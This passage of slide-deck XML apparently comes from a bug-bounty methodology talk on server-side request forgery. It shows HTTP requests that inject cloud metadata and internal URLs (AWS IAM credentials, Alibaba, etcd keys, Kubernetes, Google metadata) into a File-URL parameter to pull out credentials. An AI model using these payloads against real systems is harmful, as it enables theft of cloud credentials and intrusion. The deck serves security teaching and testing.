            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Google Shape;390;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="392" name="Google Shape;392;p5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64025" y="3067788"/>
            <a:ext cx="421000" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>latest/meta-data/iam/security-credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temporary AWS Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>latest/meta-data/iam/security-credentials/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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00" name="Google Shape;400;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="402" name="Google Shape;402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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="404" name="Google Shape;404;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Google Shape;406;p5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22925" y="3110050"/>
            <a:ext cx="503200" cy="365100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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="408" name="Google Shape;408;p5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22950" y="3514375"/>
            <a:ext cx="503200" cy="365100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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="410" name="Google Shape;410;p5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22925" y="3939538"/>
            <a:ext cx="503200" cy="36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5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22925" y="4311450"/>
            <a:ext cx="503200" cy="365100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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="4277150"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://100.100.100.200/latest/meta-data/ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://127.0.0.1:2379/v2/keys/?recursive=true </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract Credentials </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:2379/v2/keys/?recursive=true</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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20" name="Google Shape;420;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Resource</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="424" name="Google Shape;424;p5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9450" y="2675525"/>
            <a:ext cx="421000" cy="34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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://kubernetes.default.svc/metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract K</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ubernetes API</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://kubernetes.default.svc/metrics</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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32" name="Google Shape;432;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="434" name="Google Shape;434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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="436" name="Google Shape;436;p5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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metadata.google.internal/computeMetadata/v1beta1/?</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recursive=true </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To G</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rab All Internal Metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metadata.google.internal/computeMetadata/v1beta1/?recursive=true</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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44" name="Google Shape;444;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="446" name="Google Shape;446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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="448" name="Google Shape;448;p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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
